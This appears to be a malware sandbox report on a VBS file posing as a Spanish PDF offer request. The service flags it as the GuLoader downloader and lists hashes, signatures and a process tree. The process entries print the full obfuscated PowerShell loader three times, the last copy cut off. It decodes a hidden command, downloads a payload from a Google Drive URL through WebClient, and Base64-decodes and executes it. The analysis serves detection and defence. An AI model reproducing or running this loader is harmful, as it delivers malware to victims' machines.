Overview

overview

10

Static

static

1

SOLICITUD ...df.vbs

windows7-x64

10

SOLICITUD ...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23/09/2024, 15:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SOLICITUD DE OFERTA_23-09-2024·pdf.vbs

  • Size

    28KB

  • MD5

    5a65706576c1c8a4021c28a4e1f4016d

  • SHA1

    1a736c96a27370ad4848e4c67b2fbda142d76a9d

  • SHA256

    8d3fcc51b8c2c9a5dbef3cb0575df9e31319492fc94ccb681cfc4ebc0dba7905

  • SHA512

    5e74c3a5d3a8cef461bdee06f57b3b869ca681733f32fcf17b09d4b214f4b3b2d76ec622038153bbc466d4cfb75ee63c2d7110574868272cbfc9f79c0b8bdfb8

  • SSDEEP

    768:PIM0cce8YsQcf6B3iYLAT1imcypq5EQUTswhWbN/v5GXr/VkvpcvSZ:PtKT1Ymp2V

Score
10/10
guloaderdiscoverydownloader

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 3 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA_23-09-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udkradsenes Konfigurering Besgsrekord Ascarides Reabandons slikkeriet #>;$Decumbent='Aff';<#Herdsmen Ambulatoria Sstninger Eksportmarkederne #>;$Arkitektoniskes=$host.PrivateData;If ($Arkitektoniskes) {$Lunsernes++;}function Vidvinkelkameraet($Beskedent){$Reversibiliteters=$Beskedent.Length-$Lunsernes;for( $Work48=5;$Work48 -lt $Reversibiliteters;$Work48+=6){$Lavandula+=$Beskedent[$Work48];}$Lavandula;}function Lestobiotic($Repaganise){ &($Volume) ($Repaganise);}$Valgmuligheder=Vidvinkelkameraet 'Tv stMAmoeboFlod,zMatchiC surlAp,lel L nga Newz/Suver5Mi go.Knick0Matth Brest(SpeosWPh.rmi stron Kugldmark oSpallwcopros Grnt BullbNselvaTFovei Tanke1Blayn0Cteno.Afbag0Stran; Nong MarxW LytbiUlvesnPresu6ov rr4Opry.; Uptr ,acitxodori6Cam u4Un er;Rash. FrigrrTvangvdeka :D,tai1Limbe2Flosc1Humic.Teles0slowm)Orfeb RigatGSt,noe LeuccHeli,kpigmeoPrea./ etra2Cana 0 Octo1Floe,0Tvend0Optag1censo0Rigs,1Forti ru.inFTabriiOutcar DhobeMeso fAposto KuldxPos t/Dartm1Toeta2Preov1Proti.Auri 0 drha ';$Pegepinds=Vidvinkelkameraet 'Genanu Br ns S ineForunRD,plo-AfmysAIn pogKv preBrevvn Un etAdstr ';$Overthrows=Vidvinkelkameraet 'Sp rrhStyrttPyroptTavlep NonfsIndiv:Ditle/Forsl/ aucd D,tarKompaifestiv olyteEf er.Atticg,ommuoTrifuoRy,nigHerealVinkae C tm.Afd pc ColloMalacmInde./ lkaluJinshcsnapy?AbriceModvixDialypLitteoRlingr ConftAarsm=MelondugrlioGudehwH benn Bouql DarioSapphaGenredZyg,n&LigeviDynawd skod=H cti1DeacoEbutteq Dampc SkolYPr crZ AmanxepirrxGlauxEPsittuTriviILawnlpBr dg8 Bag Qd tad2 BemgYL ndiHbevidp D,llN odbrbMultilLorrah ManhSdataeMM.ybemNe vrRCrumbK aamLPah.re krmVOxoniZ En.hwMetthV Samm ';$Blameredes=Vidvinkelkameraet 'Forso>Genin ';$Volume=Vidvinkelkameraet 'M,lebi ReseEEvgrexHooey ';$Redningstjenestes='Kwela';$Antiphlogistic = Vidvinkelkameraet ' deleAnparcbeskyhCapito rown Cubit%FotoaaPrescp ellopNo sedUnderaOssictbrnehacrest%Bened\Ne,taFkommirMind aArgenuVombakVe freRokke.BirthSStorhiSe egk Dagv .ndi&Okser&s ipp p,ofie InflcTilbah lastoSamle PiezotBrode ';Lestobiotic (Vidvinkelkameraet 'Clema$ GuldgAb omlErg,toS earbbuklea .plylSols :P.ncaPMa sel Korsi DiskgUoverhSmudstNaestebronkd Don =S.mmn(Kal uc,ntermAgenddForbi Scien/Ud racBornh Enter$UndtaAOrnitn EntetmetroiVomitp Va,dhStiftlKarm oMyndeg Mer ioctansUndertUnu.niWhiskcAnsig)Bu hb ');Lestobiotic (Vidvinkelkameraet 'Ubevo$JurisgAlmonl kseoArt,rb BulkaBoobilluna :steptmApproaHanebsIngenhCangui landnStenfe .ontsCrimps spol= Kart$VrighOTov.evHel.iebowelr TaartEjendhEntrerMorgeo DiviwbardisLgemi. HydrsVul ap ommulGasfliVer ntR.gbr( culi$Bro dBSidevlPrograUngr.m ManveAf,onrGod ee BrocdOarwee snessMo.og)Mus e ');Lestobiotic (Vidvinkelkameraet 'bandm[ReforNBedriecurratPacif.Pa dlSListee LangrPressvForaniWea.icDele,eMorgePGulixoFe eri,hakenUnsigtKrepeM KernaAnkrenBogskase tegAffroeC,ulirCount]Human: Unde:Kett.SC,rkue Aceic Hejsu.ntamrSu.eri Tn.it stemy To ePKurdar ReacoPhototOver o NonccCahi ocronylFlip Trak=Eleva O erd[SavleN EpiseUdm ttBoble.SammeSFrinueDdnincLayeruStninr slaai SinotamatryLokalPLufter.ldflobattetgr teoCollec.olleoPredel AffiTFla uy Ana,pOdonte mund]Se.en:C,clo:F uorTImplilDatabsSalin1Tacca2L cop ');$Overthrows=$mashiness[0];$Kvrnens= (Vidvinkelkameraet 'Elfen$ LovvG rnneL T,muoSoldaBHugesaOutquLCafen: LeniPG ottRCura e Bj,ksfremmU ddisP Brodpbioc,o uncoS Sp,kiPial,tsma.hISerbioPr prnInvesLVatniE Co.oSOms osSt re= Eft,nProceETuberwYodel-D,amooKobbeBBajo JGrifleFosf cWerewt Zing D saS perayParaps PelaTBelsteErh,emBaryl.Weigenpyrr EsyssaTInter.CalycW Fr sEXylogBStrafCInterL RegeIAfgifEHje tN FascT');$Kvrnens+=$Plighted[1];Lestobiotic ($Kvrnens);Lestobiotic (Vidvinkelkameraet 'Rustn$RuggePHyperr Septe clavsNonreuGarblp EustpHefteoelemesRegu iMagestTricoiFolenoMerognDesanlOversemon tsModersHydra.skramHOrdreeAktivaE isadDrfyle Termr V.alsPiber[Varek$AmphiPAngioe PersgSimulefodp pHovediHelbrnNarkodUdsugsDri l] Omsa=Udsti$zooloVFavouaBurhnlerhveg Smgtmagerbu PashlOctahiSizalgLavinhAim ee NajedKnifieAirshr xtra ');$Moud=Vidvinkelkameraet 'Zioni$LuftiPTilryrFan oe Leops,eraruHistopAnt fpReassoung nsNucleiPatritRygh.iSekteoGlac,nUdrrilT leueFor,osSchoosPyron.tempeDStenooBenziwSt tenSk vrlHave o Skibaov rtd U,orFAfmeliS gmulNonfaeRecon(Lokkt$ForlgOKonstvFakuleExterrTrafitIntubhSnedkrDefroostamvwH,lessp ast,Tugle$.egleVindskiUdre.oNephillempeeTil.etEla.ttIntereFolkesU rad)Trick ';$Violettes=$Plighted[0];Lestobiotic (Vidvinkelkameraet 'Abneg$SlukkgHe,leLCompooO.strbopse,ABemrkLMisog: specF.romiLE tocAGlabeDDeba bPutteaSrboeR T.ksm inese OpdiDsymboE ,ens=Kylli(,afoytI.poneCorevsUdbant ellh- TektP Son aA chetResemHVoldg Benga$Till vEmpatILandgo utbrL Ta,deDrif.TH ndetS.ngee ilrsUnlas)Yamal ');while (!$Fladbarmede) {Lestobiotic (Vidvinkelkameraet ',rugt$VltesgophuglFi dloWobl b gunsaGrafilSalat:FordmPV rmer,acemoScrawc GniseLa.gss.agoosHjrneomeloirKra peLi terDomicn banieFys.ksFinan=E ect$ScrewtTaf irH lsnuRe.veeReven ') ;Lestobiotic $Moud;Lestobiotic (Vidvinkelkameraet 's,perSU,navtEnvelaChirorTarrat.este- ogniSParislCoacceM rcheKontopBogb. Overm4Fejlu ');Lestobiotic (Vidvinkelkameraet 'Acaly$EjendgQuomilHarpioBogfrbSp gea UndelScruf:DaterFLommel frataB,nomd BasebBlndiachinarMus.kmRewineThokid TonjeSk re=Tapes(F,dteT SavveNyhedsFl mptkapni-StoreP Rusta ndertU finhStats Anst$Po tmV.lokkiKlubboDakotlLsladeR dent RevetInfrie R tzsChair)Ripsa ') ;Lestobiotic (Vidvinkelkameraet 'Sovse$ Re.pgVat alSelvhoPrecob d.traIns rlCryoh:kreatJ ConcuOp,tad Tan,oYoghokHaemaa Shik=Arc e$AdamagN netlHal,moPolygbBinzuaEvisll.eage:Kool,dRseneaBif gmDocernF,nyaaAk.umtSakkaoPlumrrInspayUss l+Sekve+ yps%Fatal$.angomS udka Kla s BenzhMy opiBlattn romeeRe ursAmb lsDispa.QuickcAlb.mo nomouLi,jenFart,tBrn p ') ;$Overthrows=$mashiness[$Judoka];}$Tegningers=300517;$Medial=30436;Lestobiotic (Vidvinkelkameraet 'Fo en$IdentgHovedlFalteoHrkrmbTandraBrabbl Oxys:FistiD Kra eDisq n enomuChicknL.ggicSericiMa neaFredetCouraiB ttevGradue Lovf2Maim.1Sol,e8 Supe Unde=Fo,ko NoncoGFort.e RapstArthr-Ba.dpCzacatoAarrinIntertEmisseScribnB.sant,veru Besou$Pro,uVSt.ntiStdt o Tal lSkorzeWhoret.ncoltAntineKr.vos etud ');Lestobiotic (Vidvinkelkameraet ' Fa.t$ P etgBreddlDomfloSla sbDustiaPa kelRialt:FrinuHSjlehe Tv vlAus ul TjeneAn inbstum aFremhrkransdFy tjiWeekesIgnistFrdseeArd ar toze Conce=,oass ,ncon[F ftyS Stokyautoss TaxitRatioeMatrim,olum.AarsdCHarleoSp nsnUnsurvUnreveEun.krUafhntPrefi]Triqu:Bndse:SectiFTipolrKampio Sonam depaBKatteaSteresBundfeKylli6Decer4UdeluSPre at ,kunrTag,eiAnomonPulicgImp t(Pa,jf$ TillDThermeCowb.nDe inuSputanqueercma emiSona aBjlentClutti ,saavBondeePulpa2 End 1Godke8Du er) salo ');Lestobiotic (Vidvinkelkameraet 'Sparr$ UnfogBypaslAguilo B ndb GustaAdvoklpalae:HovedDFlgbrrSinewg Refee formnSelade Lichs Odo, Iodop=Jekat Stokk[ArbejSNo.rayAdjacs Tar tParteeRel smUnexp.HaphtTForske emi,x FordtNep,r. Far.EIndsnnP dgic ServoUnwi.dGangsiHarnin lodagValdh] visu:Til,l:DobbeA ymphS P,ltC FyrsILirekI ,asi.DekanGFragteSigmatPaintS Wed tSkuesrKongsiProcrnPommegRea,p(Forst$ TidsHSkulkeS redlSarcolEducaeDisembSpartatiggerBevindOsciliTrolds,ejrstBaldeeStatsrBnder)Wirep ');Lestobiotic (Vidvinkelkameraet 'Athwa$Out hg SerblBasiloLandfbslikaaComfol yphe:FusenBSlje e fugnk MandeSolvrnStraad UnhatauburhSu.fueMemord Cent9 ind5Dkrl.=El te$IconoD TranrTo grgSalige FopdnnabobeAutovsBorde. Phans.iggeuva albFinensMusvitFe rarIndvai BortnStyreg Un t(Diarr$AftviTobrazeargoagLinjenR adfiFjer nBo tegStatsemisaprDgnbosLeat.,Scath$OsphrMPaakleGoldtdFre diThyroaNigrelContr)Mud e ');Lestobiotic $Bekendthed95;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Frauke.Sik && echo t"
        3⤵
          PID:2736
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Udkradsenes Konfigurering Besgsrekord Ascarides Reabandons slikkeriet #>;$Decumbent='Aff';<#Herdsmen Ambulatoria Sstninger Eksportmarkederne #>;$Arkitektoniskes=$host.PrivateData;If ($Arkitektoniskes) {$Lunsernes++;}function Vidvinkelkameraet($Beskedent){$Reversibiliteters=$Beskedent.Length-$Lunsernes;for( $Work48=5;$Work48 -lt $Reversibiliteters;$Work48+=6){$Lavandula+=$Beskedent[$Work48];}$Lavandula;}function Lestobiotic($Repaganise){ &($Volume) ($Repaganise);}$Valgmuligheder=Vidvinkelkameraet 'Tv stMAmoeboFlod,zMatchiC surlAp,lel L nga Newz/Suver5Mi go.Knick0Matth Brest(SpeosWPh.rmi stron Kugldmark oSpallwcopros Grnt BullbNselvaTFovei Tanke1Blayn0Cteno.Afbag0Stran; Nong MarxW LytbiUlvesnPresu6ov rr4Opry.; Uptr ,acitxodori6Cam u4Un er;Rash. FrigrrTvangvdeka :D,tai1Limbe2Flosc1Humic.Teles0slowm)Orfeb RigatGSt,noe LeuccHeli,kpigmeoPrea./ etra2Cana 0 Octo1Floe,0Tvend0Optag1censo0Rigs,1Forti ru.inFTabriiOutcar DhobeMeso fAposto KuldxPos t/Dartm1Toeta2Preov1Proti.Auri 0 drha ';$Pegepinds=Vidvinkelkameraet 'Genanu Br ns S ineForunRD,plo-AfmysAIn pogKv preBrevvn Un etAdstr ';$Overthrows=Vidvinkelkameraet 'Sp rrhStyrttPyroptTavlep NonfsIndiv:Ditle/Forsl/ aucd D,tarKompaifestiv olyteEf er.Atticg,ommuoTrifuoRy,nigHerealVinkae C tm.Afd pc ColloMalacmInde./ lkaluJinshcsnapy?AbriceModvixDialypLitteoRlingr ConftAarsm=MelondugrlioGudehwH benn Bouql DarioSapphaGenredZyg,n&LigeviDynawd skod=H cti1DeacoEbutteq Dampc SkolYPr crZ AmanxepirrxGlauxEPsittuTriviILawnlpBr dg8 Bag Qd tad2 BemgYL ndiHbevidp D,llN odbrbMultilLorrah ManhSdataeMM.ybemNe vrRCrumbK aamLPah.re krmVOxoniZ En.hwMetthV Samm ';$Blameredes=Vidvinkelkameraet 'Forso>Genin ';$Volume=Vidvinkelkameraet 'M,lebi ReseEEvgrexHooey ';$Redningstjenestes='Kwela';$Antiphlogistic = Vidvinkelkameraet ' deleAnparcbeskyhCapito rown Cubit%FotoaaPrescp ellopNo sedUnderaOssictbrnehacrest%Bened\Ne,taFkommirMind aArgenuVombakVe freRokke.BirthSStorhiSe egk Dagv .ndi&Okser&s ipp p,ofie InflcTilbah lastoSamle PiezotBrode ';Lestobiotic (Vidvinkelkameraet 'Clema$ GuldgAb omlErg,toS earbbuklea .plylSols :P.ncaPMa sel Korsi DiskgUoverhSmudstNaestebronkd Don =S.mmn(Kal uc,ntermAgenddForbi Scien/Ud racBornh Enter$UndtaAOrnitn EntetmetroiVomitp Va,dhStiftlKarm oMyndeg Mer ioctansUndertUnu.niWhiskcAnsig)Bu hb ');Lestobiotic (Vidvinkelkameraet 'Ubevo$JurisgAlmonl kseoArt,rb BulkaBoobilluna :steptmApproaHanebsIngenhCangui landnStenfe .ontsCrimps spol= Kart$VrighOTov.evHel.iebowelr TaartEjendhEntrerMorgeo DiviwbardisLgemi. HydrsVul ap ommulGasfliVer ntR.gbr( culi$Bro dBSidevlPrograUngr.m ManveAf,onrGod ee BrocdOarwee snessMo.og)Mus e ');Lestobiotic (Vidvinkelkameraet 'bandm[ReforNBedriecurratPacif.Pa dlSListee LangrPressvForaniWea.icDele,eMorgePGulixoFe eri,hakenUnsigtKrepeM KernaAnkrenBogskase tegAffroeC,ulirCount]Human: Unde:Kett.SC,rkue Aceic Hejsu.ntamrSu.eri Tn.it stemy To ePKurdar ReacoPhototOver o NonccCahi ocronylFlip Trak=Eleva O erd[SavleN EpiseUdm ttBoble.SammeSFrinueDdnincLayeruStninr slaai SinotamatryLokalPLufter.ldflobattetgr teoCollec.olleoPredel AffiTFla uy Ana,pOdonte mund]Se.en:C,clo:F uorTImplilDatabsSalin1Tacca2L cop ');$Overthrows=$mashiness[0];$Kvrnens= (Vidvinkelkameraet 'Elfen$ LovvG rnneL T,muoSoldaBHugesaOutquLCafen: LeniPG ottRCura e Bj,ksfremmU ddisP Brodpbioc,o uncoS Sp,kiPial,tsma.hISerbioPr prnInvesLVatniE Co.oSOms osSt re= Eft,nProceETuberwYodel-D,amooKobbeBBajo JGrifleFosf cWerewt Zing D saS perayParaps PelaTBelsteErh,emBaryl.Weigenpyrr EsyssaTInter.CalycW Fr sEXylogBStrafCInterL RegeIAfgifEHje tN FascT');$Kvrnens+=$Plighted[1];Lestobiotic ($Kvrnens);Lestobiotic (Vidvinkelkameraet 'Rustn$RuggePHyperr Septe clavsNonreuGarblp EustpHefteoelemesRegu iMagestTricoiFolenoMerognDesanlOversemon tsModersHydra.skramHOrdreeAktivaE isadDrfyle Termr V.alsPiber[Varek$AmphiPAngioe PersgSimulefodp pHovediHelbrnNarkodUdsugsDri l] Omsa=Udsti$zooloVFavouaBurhnlerhveg Smgtmagerbu PashlOctahiSizalgLavinhAim ee NajedKnifieAirshr xtra ');$Moud=Vidvinkelkameraet 'Zioni$LuftiPTilryrFan oe Leops,eraruHistopAnt fpReassoung nsNucleiPatritRygh.iSekteoGlac,nUdrrilT leueFor,osSchoosPyron.tempeDStenooBenziwSt tenSk vrlHave o Skibaov rtd U,orFAfmeliS gmulNonfaeRecon(Lokkt$ForlgOKonstvFakuleExterrTrafitIntubhSnedkrDefroostamvwH,lessp ast,Tugle$.egleVindskiUdre.oNephillempeeTil.etEla.ttIntereFolkesU rad)Trick ';$Violettes=$Plighted[0];Lestobiotic (Vidvinkelkameraet 'Abneg$SlukkgHe,leLCompooO.strbopse,ABemrkLMisog: specF.romiLE tocAGlabeDDeba bPutteaSrboeR T.ksm inese OpdiDsymboE ,ens=Kylli(,afoytI.poneCorevsUdbant ellh- TektP Son aA chetResemHVoldg Benga$Till vEmpatILandgo utbrL Ta,deDrif.TH ndetS.ngee ilrsUnlas)Yamal ');while (!$Fladbarmede) {Lestobiotic (Vidvinkelkameraet ',rugt$VltesgophuglFi dloWobl b gunsaGrafilSalat:FordmPV rmer,acemoScrawc GniseLa.gss.agoosHjrneomeloirKra peLi terDomicn banieFys.ksFinan=E ect$ScrewtTaf irH lsnuRe.veeReven ') ;Lestobiotic $Moud;Lestobiotic (Vidvinkelkameraet 's,perSU,navtEnvelaChirorTarrat.este- ogniSParislCoacceM rcheKontopBogb. Overm4Fejlu ');Lestobiotic (Vidvinkelkameraet 'Acaly$EjendgQuomilHarpioBogfrbSp gea UndelScruf:DaterFLommel frataB,nomd BasebBlndiachinarMus.kmRewineThokid TonjeSk re=Tapes(F,dteT SavveNyhedsFl mptkapni-StoreP Rusta ndertU finhStats Anst$Po tmV.lokkiKlubboDakotlLsladeR dent RevetInfrie R tzsChair)Ripsa ') ;Lestobiotic (Vidvinkelkameraet 'Sovse$ Re.pgVat alSelvhoPrecob d.traIns rlCryoh:kreatJ ConcuOp,tad Tan,oYoghokHaemaa Shik=Arc e$AdamagN netlHal,moPolygbBinzuaEvisll.eage:Kool,dRseneaBif gmDocernF,nyaaAk.umtSakkaoPlumrrInspayUss l+Sekve+ yps%Fatal$.angomS udka Kla s BenzhMy opiBlattn romeeRe ursAmb lsDispa.QuickcAlb.mo nomouLi,jenFart,tBrn p ') ;$Overthrows=$mashiness[$Judoka];}$Tegningers=300517;$Medial=30436;Lestobiotic (Vidvinkelkameraet 'Fo en$IdentgHovedlFalteoHrkrmbTandraBrabbl Oxys:FistiD Kra eDisq n enomuChicknL.ggicSericiMa neaFredetCouraiB ttevGradue Lovf2Maim.1Sol,e8 Supe Unde=Fo,ko NoncoGFort.e RapstArthr-Ba.dpCzacatoAarrinIntertEmisseScribnB.sant,veru Besou$Pro,uVSt.ntiStdt o Tal lSkorzeWhoret.ncoltAntineKr.vos etud ');Lestobiotic (Vidvinkelkameraet ' Fa.t$ P etgBreddlDomfloSla sbDustiaPa kelRialt:FrinuHSjlehe Tv vlAus ul TjeneAn inbstum aFremhrkransdFy tjiWeekesIgnistFrdseeArd ar toze Conce=,oass ,ncon[F ftyS Stokyautoss TaxitRatioeMatrim,olum.AarsdCHarleoSp nsnUnsurvUnreveEun.krUafhntPrefi]Triqu:Bndse:SectiFTipolrKampio Sonam depaBKatteaSteresBundfeKylli6Decer4UdeluSPre at ,kunrTag,eiAnomonPulicgImp t(Pa,jf$ TillDThermeCowb.nDe inuSputanqueercma emiSona aBjlentClutti ,saavBondeePulpa2 End 1Godke8Du er) salo ');Lestobiotic (Vidvinkelkameraet 'Sparr$ UnfogBypaslAguilo B ndb GustaAdvoklpalae:HovedDFlgbrrSinewg Refee formnSelade Lichs Odo, Iodop=Jekat Stokk[ArbejSNo.rayAdjacs Tar tParteeRel smUnexp.HaphtTForske emi,x FordtNep,r. Far.EIndsnnP dgic ServoUnwi.dGangsiHarnin lodagValdh] visu:Til,l:DobbeA ymphS P,ltC FyrsILirekI ,asi.DekanGFragteSigmatPaintS Wed tSkuesrKongsiProcrnPommegRea,p(Forst$ TidsHSkulkeS redlSarcolEducaeDisembSpartatiggerBevindOsciliTrolds,ejrstBaldeeStatsrBnder)Wirep ');Lestobiotic (Vidvinkelkameraet 'Athwa$Out hg SerblBasiloLandfbslikaaComfol yphe:FusenBSlje e fugnk MandeSolvrnStraad UnhatauburhSu.fueMemord Cent9 ind5Dkrl.=El te$IconoD TranrTo grgSalige FopdnnabobeAutovsBorde. Phans.iggeuva albFinensMusvitFe rarIndvai BortnStyreg Un t(Diarr$AftviTobrazeargoagLinjenR adfiFjer nBo tegStatsemisaprDgnbosLeat.,Scath$OsphrMPaakleGoldtdFre diThyroaNigrelContr)Mud e ');Lestobiotic $Bekendthed95;"
          3⤵
          • Network Service Discovery
          • Suspicious use of WriteProcessMemory
          PID:2168
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udkradsenes Konfigurering Besgsrekord Ascarides Reabandons slikkeriet #>;$Decumbent='Aff';<#Herdsmen Ambulatoria Sstninger Eksportmarkederne #>;$Arkitektoniskes=$host.PrivateData;If ($Arkitektoniskes) {$Lunsernes++;}function Vidvinkelkameraet($Beskedent){$Reversibiliteters=$Beskedent.Length-$Lunsernes;for( $Work48=5;$Work48 -lt $Reversibiliteters;$Work48+=6){$Lavandula+=$Beskedent[$Work48];}$Lavandula;}function Lestobiotic($Repaganise){ &($Volume) ($Repaganise);}$Valgmuligheder=Vidvinkelkameraet 'Tv stMAmoeboFlod,zMatchiC surlAp,lel L nga Newz/Suver5Mi go.Knick0Matth Brest(SpeosWPh.rmi stron Kugldmark oSpallwcopros Grnt BullbNselvaTFovei Tanke1Blayn0Cteno.Afbag0Stran; Nong MarxW LytbiUlvesnPresu6ov rr4Opry.; Uptr ,acitxodori6Cam u4Un er;Rash. FrigrrTvangvdeka :D,tai1Limbe2Flosc1Humic.Teles0slowm)Orfeb RigatGSt,noe LeuccHeli,kpigmeoPrea./ etra2Cana 0 Octo1Floe,0Tvend0Optag1censo0Rigs,1Forti ru.inFTabriiOutcar DhobeMeso fAposto KuldxPos t/Dartm1Toeta2Preov1Proti.Auri 0 drha ';$Pegepinds=Vidvinkelkameraet 'Genanu Br ns S ineForunRD,plo-AfmysAIn pogKv preBrevvn Un etAdstr ';$Overthrows=Vidvinkelkameraet 'Sp rrhStyrttPyroptTavlep NonfsIndiv:Ditle/Forsl/ aucd D,tarKompaifestiv olyteEf er.Atticg,ommuoTrifuoRy,nigHerealVinkae C tm.Afd pc ColloMalacmInde./ lkaluJinshcsnapy?AbriceModvixDialypLitteoRlingr ConftAarsm=MelondugrlioGudehwH benn Bouql DarioSapphaGenredZyg,n&LigeviDynawd skod=H cti1DeacoEbutteq Dampc SkolYPr crZ AmanxepirrxGlauxEPsittuTriviILawnlpBr dg8 Bag Qd tad2 BemgYL ndiHbevidp D,llN odbrbMultilLorrah ManhSdataeMM.ybemNe vrRCrumbK aamLPah.re krmVOxoniZ En.hwMetthV Samm ';$Blameredes=Vidvinkelkameraet 'Forso>Genin ';$Volume=Vidvinkelkameraet 'M,lebi ReseEEvgrexHooey ';$Redningstjenestes='Kwela';$Antiphlogistic = Vidvinkelkameraet ' deleAnparcbeskyhCapito rown Cubit%FotoaaPrescp ellopNo sedUnderaOssictbrnehacrest%Bened\Ne,taFkommirMind aArgenuVombakVe freRokke.BirthSStorhiSe egk Dagv .ndi&Okser&s ipp p,ofie InflcTilbah lastoSamle PiezotBrode ';Lestobiotic (Vidvinkelkameraet 'Clema$ GuldgAb omlErg,toS earbbuklea .plylSols :P.ncaPMa sel Korsi DiskgUoverhSmudstNaestebronkd Don =S.mmn(Kal uc,ntermAgenddForbi Scien/Ud racBornh Enter$UndtaAOrnitn EntetmetroiVomitp Va,dhStiftlKarm oMyndeg Mer ioctansUndertUnu.niWhiskcAnsig)Bu hb ');Lestobiotic (Vidvinkelkameraet 'Ubevo$JurisgAlmonl kseoArt,rb BulkaBoobilluna :steptmApproaHanebsIngenhCangui landnStenfe .ontsCrimps spol= Kart$VrighOTov.evHel.iebowelr TaartEjendhEntrerMorgeo DiviwbardisLgemi. HydrsVul ap ommulGasfliVer ntR.gbr( culi$Bro dBSidevlPrograUngr.m ManveAf,onrGod ee BrocdOarwee snessMo.og)Mus e ');Lestobiotic (Vidvinkelkameraet 'bandm[ReforNBedriecurratPacif.Pa dlSListee LangrPressvForaniWea.icDele,eMorgePGulixoFe eri,hakenUnsigtKrepeM KernaAnkrenBogskase tegAffroeC,ulirCount]Human: Unde:Kett.SC,rkue Aceic Hejsu.ntamrSu.eri Tn.it stemy To ePKurdar ReacoPhototOver o NonccCahi ocronylFlip Trak=Eleva O erd[SavleN EpiseUdm ttBoble.SammeSFrinueDdnincLayeruStninr slaai SinotamatryLokalPLufter.ldflobattetgr teoCollec.olleoPredel AffiTFla uy Ana,pOdonte mund]Se.en:C,clo:F uorTImplilDatabsSalin1Tacca2L cop ');$Overthrows=$mashiness[0];$Kvrnens= (Vidvinkelkameraet 'Elfen$ LovvG rnneL T,muoSoldaBHugesaOutquLCafen: LeniPG ottRCura e Bj,ksfremmU ddisP Brodpbioc,o uncoS Sp,kiPial,tsma.hISerbioPr prnInvesLVatniE Co.oSOms osSt re= Eft,nProceETuberwYodel-D,amooKobbeBBajo JGrifleFosf cWerewt Zing D saS perayParaps PelaTBelsteErh,emBaryl.Weigenpyrr EsyssaTInter.CalycW Fr sEXylogBStrafCInterL RegeIAfgifEHje tN FascT');$Kvrnens+=$Plighted[1];Lestobiotic ($Kvrnens);Lestobiotic (Vidvinkelkameraet 'Rustn$RuggePHyperr Septe clavsNonreuGarblp EustpHefteoelemesRegu iMagestTricoiFolenoMerognDesanlOversemon tsModersHydra.skramHOrdreeAktivaE isadDrfyle Termr V.alsPiber[Varek$AmphiPAngioe PersgSimulefodp pHovediHelbrnNarkodUdsugsDri l] Omsa=Udsti$zooloVFavouaBurhnlerhveg Smgtmagerbu PashlOctahiSizalgLavinhAim ee NajedKnifieAirshr xtra ');$Moud=Vidvinkelkameraet 'Zioni$LuftiPTilryrFan oe Leops,eraruHistopAnt fpReassoung nsNucleiPatritRygh.iSekteoGlac,nUdrrilT leueFor,osSchoosPyron.tempeDStenooBenziwSt tenSk vrlHave o Skibaov rtd U,orFAfmeliS gmulNonfaeRecon(Lokkt$ForlgOKonstvFakuleExterrTrafitIntubhSnedkrDefroostamvwH,lessp ast,Tugle$.egleVindskiUdre.oNephillempeeTil.etEla.ttIntereFolkesU rad)Trick ';$Violettes=$Plighted[0];Lestobiotic (Vidvinkelkameraet 'Abneg$SlukkgHe,leLCompooO.strbopse,ABemrkLMisog: specF.romiLE tocAGlabeDDeba bPutteaSrboeR T.ksm inese OpdiDsymboE ,ens=Kylli(,afoytI.poneCorevsUdbant ellh- TektP Son aA chetResemHVoldg Benga$Till vEmpatILandgo utbrL Ta,deDrif.TH ndetS.ngee ilrsUnlas)Yamal ');while (!$Fladbarmede) {Lestobiotic (Vidvinkelkameraet ',rugt$VltesgophuglFi dloWobl b gunsaGrafilSalat:FordmPV rmer,acemoScrawc GniseLa.gss.agoosHjrneomeloirKra peLi terDomicn banieFys.ksFinan=E ect$ScrewtTaf irH lsnuRe.veeReven ') ;Lestobiotic $Moud;Lestobiotic (Vidvinkelkameraet 's,perSU,navtEnvelaChirorTarrat.este- ogniSParislCoacceM rcheKontopBogb. Overm4Fejlu ');Lestobiotic (Vidvinkelkameraet 'Acaly$EjendgQuomilHarpioBogfrbSp gea UndelScruf:DaterFLommel frataB,nomd BasebBlndiachinarMus.kmRewineThokid TonjeSk re=Tapes(F,dteT SavveNyhedsFl 